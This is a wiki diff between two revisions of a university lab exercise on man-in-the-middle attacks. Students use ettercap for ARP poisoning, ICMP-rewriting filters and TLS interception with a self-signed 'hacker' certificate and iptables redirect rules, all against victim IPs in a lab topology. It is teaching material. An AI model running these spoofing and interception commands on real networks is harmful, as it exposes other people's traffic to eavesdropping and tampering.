Show page

Differences

This shows you the differences between two versions of the page.

--- cdci:labs:4 [2020/03/15 13:07]
mihai.chiroiu [07. [10p] HTTPS traffic inspection]
+++ cdci:labs:4 [2021/03/26 18:29] (current)
mihai.chiroiu
@@ Line 1: / Line 1: @@
 ====== Lab04. Man-in-the-middle attack  ======
+<note warning>
+Important read to be graded!
+{{page>:cdci:rec&nofooter&noeditbutton&noheader}}
+</note>
 ===== Objectives =====
@@ Line 16: / Line 21: @@
 First, make sure that your virtual machine is updated (run the provided update.sh script, or create one).
-<code>
-root@cdci:/# cat update.sh
-#!/bin/bash
-# (c) Mihai Chiroiu - CDCI
-git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git
-git config user.email "student@upb.ro"
-</code>
 Next, in one terminal start the provided Mininet topology.
@@ Line 35: / Line 32: @@
 ==== 02. [5p] Internet connectivity ====
-Before you begin, make sure that you have Internet connectivity on all two nodes (attacker and victim). R1 should be the gateway for the Attacker and Victim. Write down the MAC and IP addresses of all 3 nodes (including the gateway).
+Before you begin, make sure that you have Internet connectivity on all two nodes (attacker and victim). R1 should be the gateway for the Attacker and Victim. Write down the MAC and IP addresses of all 3 nodes (including the gateway). Use the provided scripts to access the nodes.
+<code>
+root@ip-172-30-0-165:/# ./attacker_bash.sh
+root@attacker:/#
+root@ip-172-30-0-165:/# ./victim_bash.sh
+root@victim:/#
+</code>
-==== 03. [20p] Virtual machine setup ====
+==== 03. [30p] ARP poisoning MITM attack ====
 The goal of this exercise is to pass all the victim's traffic through the attacker's machine. From the Attacker node start an ARP poisoning mitm attack against the Victim machine using ettercap tool. Use “ping” tool from Victim and make sure that all traffic (including to outside) goes through the Attacker’s node (use extra verbose option for ettercap).
@@ Line 80: / Line 84: @@
 </note>
-==== 05. [10p] Raw packets altering ====
+==== 05. [20p] Raw packets altering ====
 Ettercap filters can also be used to modify packets as they pass through the attacker’s node. Use the provided filter to change icmp type from echo to reply (Hint: [[https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml]]).
@@ Line 93: / Line 97: @@
 cat icmp.filter
 if (ip.proto == ICMP) {
-  msg("Changing address!\n");
+   msg("Changing ICMP type!\n");
   replace("8.8.8.8", "8.8.4.4");
  }
+etterfilter icmp.filter -o icmp.ef
 </code>
@@ Line 101: / Line 106: @@
 <code>
 cat icmp.filter
-if (ip.proto == ICMP) {
+if (ip.proto == ICMP && icmp.type == 0) {
-   msg("Changing ICMP type!\n");
+  msg("Changing address!\n");
-  replace("8.8.8.8", "8.8.4.4");
+  icmp.type = 8;
  }
 etterfilter icmp.filter -o icmp.ef
@@ Line 149: / Line 154: @@
 </code>
 </solution>
-==== 07. [10p] HTTPS traffic inspection ====
+==== 07. [20p] HTTPS traffic inspection ====
 Unfortunately, HTTPS traffic cannot be inspected, or can it :). We will try to use ettercap and observe changes in the certificate chain when MITM attack is active.
@@ Line 164: / Line 169: @@
   * Now, run ettercap including TLS MITM.
-<solution>
+<note tip>
+For the TLS MITM you will require a certificate and a private key to be used when running ettercap (hint: [[https://manpages.debian.org/jessie/ettercap-common/ettercap.8.en.html|--certificate]]). Use the following code to create the private key and certificate.
 <code>
-root@victim:/# openssl s_client -showcerts www.cisco.com:443
+root@attacker:~# openssl genrsa -out hacker.pem 2048
-CONNECTED(00000005)
+root@attacker:~# openssl req -x509 -new -key hacker.pem -sha256 -days 365 -out hacker.crt
-depth=1 C = US, O = HydrantID (Avalanche Cloud Corporation), CN = HydrantID SSL ICA G2
+</code>
-verify error:num=20:unable to get local issuer certificate
+</note>
----
-Certificate chain
-s:C = US, ST = California, L = San Jose, O = "Cisco Systems, Inc.", CN = www.cisco.com
-   i:C = US, O = HydrantID (Avalanche Cloud Corporation), CN = HydrantID SSL ICA G2
------BEGIN CERTIFICATE-----
-[...]
-closed
+<note tip>
+For the MITM TLS attack we have to allow ettercap to run as root user and enable iptables configurations. This is required to allow ettercap SSL filter to receive and decode the TLS traffic. Modify the configuration file, “/etc/ettercap/etter.conf”, with the following.
+<code>
+ec_uid = 0
+ec_gid = 0
+# if you use iptables:
+redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
+redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
+redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
+redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
+</code>
+</note>
+<solution>
+<code>
+root@attacker:~# ettercap -E -T -M ARP:remote --private-key hacker.pem --certificate hacker.crt /192.168.16.100// /192.168.16.1//
-ettercap -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// -S
+root@victim:~# openssl s_client -showcerts www.google.com:443
+CONNECTED(00000005)
+depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
+verify error:num=18:self signed certificate
+verify return:1
+depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
+verify return:1
+---
 </code>
 </solution>

General info CDCI

Lectures

Labs

Assignments

Resources

Useful resources

cdci/labs/4.1584270428.txt.gz · Last modified: 2020/03/15 13:07 by mihai.chiroiu

Show page Old revisions

Media Manager Back to top